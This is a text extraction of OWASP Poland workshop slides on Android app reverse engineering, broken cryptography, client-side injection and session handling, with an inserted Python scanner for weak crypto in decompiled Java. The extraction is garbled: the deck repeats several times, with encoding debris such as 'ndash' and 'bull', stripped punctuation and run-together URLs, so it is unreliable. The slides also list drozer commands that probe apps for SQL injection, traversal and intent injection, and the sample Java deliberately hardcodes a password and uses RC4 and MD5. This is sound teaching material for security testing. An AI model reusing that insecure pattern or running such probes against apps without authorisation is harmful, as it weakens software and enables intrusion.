• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone
– APKOptic
– Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling – High Level – Java Code
• Disassembling – Low Level – Assembly Code
• Why Disassembling and not Decompiling?
Decompiling
DEX → JAR → JAVA
Decompiling - Dex2Jar
• dex2jar
– Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
– Allows you to use any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
– Closed source Java decompiler
– Combined with dex2jar, you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool
– Open source Java tool for reverse-engineering Android apps
– Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling – Luyten
Demo: Modify Smali Files
Demo
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• Few reminders (yeah, I know you know it…):
– encoding ≠ encryption
– obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if an application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
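An added example that is not part of the workshop: a Python scanner that runs the "how to find" checklist above over decompiled Java source (for instance JD-GUI or Luyten output), flagging deprecated algorithms passed to getInstance(), key or IV material written as string literals, and constants whose names suggest credentials. The Java snippet it scans is constructed, and the patterns are heuristics that need a human review of every hit.

```python
"""Flag insecure crypto usage in decompiled Java source (added example).

Mechanises the slide's checklist: deprecated algorithms (RC4, MD4, MD5, SHA1),
literal key/IV material, and suspiciously named string constants.
"""
import re
from typing import Dict, List, Tuple

Finding = Tuple[int, str, str]   # (line number, category, detail)

WEAK_ALGORITHMS = {"RC4", "ARCFOUR", "MD4", "MD5", "SHA1", "SHA-1"}

# Algorithm name handed to a JCA factory, e.g. Cipher.getInstance("RC4").
GET_INSTANCE = re.compile(
    r'\b(?:Cipher|MessageDigest|Mac|KeyGenerator|SecretKeyFactory)'
    r'\.getInstance\(\s*"([^"]+)"')
# Key or IV built directly from a string literal in the binary.
LITERAL_KEY_MATERIAL = re.compile(
    r'new\s+(SecretKeySpec|IvParameterSpec)\(\s*"([^"]*)"\.getBytes\(')
# String constant whose name hints at a credential (heuristic, may false-positive).
SUSPICIOUS_CONSTANT = re.compile(
    r'\b(?:String|char\[\])\s+(\w*(?:key|pass|pwd|secret|token)\w*)\s*=\s*"([^"]+)"',
    re.IGNORECASE)


def scan_java(source: str) -> List[Finding]:
    """Scan decompiled Java text line by line and return all findings in order."""
    findings: List[Finding] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for m in GET_INSTANCE.finditer(line):
            algo = m.group(1)
            # "AES/GCM/NoPadding" -> "AES"; compare only the algorithm part.
            if algo.split("/")[0].upper() in WEAK_ALGORITHMS:
                findings.append((lineno, "weak-algorithm", algo))
        for m in LITERAL_KEY_MATERIAL.finditer(line):
            findings.append((lineno, "hardcoded-key",
                             f'{m.group(1)} built from literal "{m.group(2)}"'))
        for m in SUSPICIOUS_CONSTANT.finditer(line):
            findings.append((lineno, "hardcoded-secret",
                             f'{m.group(1)} = "{m.group(2)}"'))
    return findings


def count_by_category(findings: List[Finding]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for _, category, _ in findings:
        counts[category] = counts.get(category, 0) + 1
    return counts


# Constructed sample: what a decompiled "encrypted db with a hardcoded
# password" helper tends to look like. Names and values are made up.
SAMPLE_JAVA = r'''
public class VaultHelper {
    private static final String DB_PASSWORD = "s3cr3t-db-pass";
    private static final String TAG = "VaultHelper";

    void open(String path) {
        SQLiteDatabase db = SQLiteDatabase.openOrCreateDatabase(path, DB_PASSWORD, null);
        Cipher legacy = Cipher.getInstance("RC4");
        MessageDigest md = MessageDigest.getInstance("MD5");
        SecretKeySpec key = new SecretKeySpec("0123456789abcdef".getBytes(), "AES");
        Cipher modern = Cipher.getInstance("AES/GCM/NoPadding");
        MessageDigest strong = MessageDigest.getInstance("SHA-256");
    }
}
'''

if __name__ == "__main__":
    for lineno, category, detail in scan_java(SAMPLE_JAVA):
        print(f"line {lineno:>3}  {category:<17} {detail}")
```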
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password to decrypt it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known, strong cryptography implementations
• Do not hardcode keys, credentials or OAuth tokens
• Do not store keys on a device. Use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as an input and executed by the application (on the client side)
• The malicious code can come from:
– Other application via intent/content provider
– Shared file
– Server response
– Third party website
Client side injection – what to inject
• SQL injection to local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android's toy – the Intents
• Android application can talk (Inter-Process Communication) to any other component (e.g. other application, system service, running new activity, etc.) via special objects called Intents
Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections
dz> run scanner.provider.injection -a <package_name>
• Data path traversal
dz> run scanner.provider.traversal -a <package_name>
• Intent injections
dz> run app.package.manifest -a <package_name>
dz> run app.activity.info -a <package_name>
dz> run app.service.info --permission null -a <package_name>
dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone – APKOptic – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling – high level – Java code
• Disassembling – low level – assembly code
• Why disassembling and not decompiling?
Decompiling
DEX → JAR → JAVA
Decompiling – dex2jar
• dex2jar – converts Dalvik bytecode (DEX) to Java bytecode (JAR) – allows any existing Java decompiler to be used with the resulting JAR file
Decompiling – Java decompilers
• JD-GUI || Luyten – closed-source Java decompiler – combined with dex2jar, you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different output
